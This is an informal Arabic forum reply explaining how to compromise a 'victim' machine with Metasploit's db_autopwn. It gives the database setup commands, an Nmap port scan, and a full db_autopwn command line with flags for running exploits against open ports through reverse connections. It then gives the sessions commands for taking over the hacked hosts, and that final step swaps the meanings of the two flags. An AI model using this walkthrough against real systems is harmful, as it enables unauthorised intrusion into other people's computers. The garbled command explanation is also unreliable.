اخي الكريم
العملية بشكل مبسط هي عبارة عن اتصال عكسي فمن الضروري ان يكون بورت معين مفنوح في الجهازين لتمكين الاتصال
يمكنك استخدام اكسبلويت اوتو اول شي الثغرة بتندرج تحت اسم autopwn
والثغرة بتحتاج لقاعدة بيانات منجيبها من الامر : load db_sqlite3
اوك الامر التاني db_create autopwn
بعد كذا تشيك البورتات المفتوحة بجهاز الضحية ببرنامج Nmap
وبعد مشاهدنا للبورتات والبيانات نشوف شو عندنا خيارات للاستغلال بالامر db_autopwn
انا رح اكتب الاستغلال واشرح شو كتبت
الامر db_autopwn -e -p -r -I xxx.xxx.xxx.xxx(victim ip)
يعني : انو استغل ضمن هالشروط :
-e : شغل الثغرات
-p : خلي الاستغلال يكون عالبورتات المفتوحة
-r : خلي يكون الاستغلال على شكل اتصال عكسي
-I : هاد الامر مهم باللوكال وبيعني انو جرب الاستغلال عالايبيات الي محصورة بين
القيمتين يلي رح نحددهم .... طبعا انا حطيت اي بي واحد ليكون الاستغلال على هالاي بي
بس واخر شي يعني لو ما حطيتو هالامر راح يبحث عالشبكة كلا وحاول يتصل مع الكل
وهاذا بياخد وقت كبير كتير وبيستغل جزء من الذاكرة بالاضافة لخطورة الموضوع..
شوي

المهم هالموضوع بياكل شوية وقت
بالاخير اذا تمكنتوا ان تتصلو مع الضحية بتنفذو الامر sessions -i ID
لتشوفو الاجهزة الي تمكنتو من اختراقها و الامر sessions -l
لتخترق الجهاز
تحياتي لك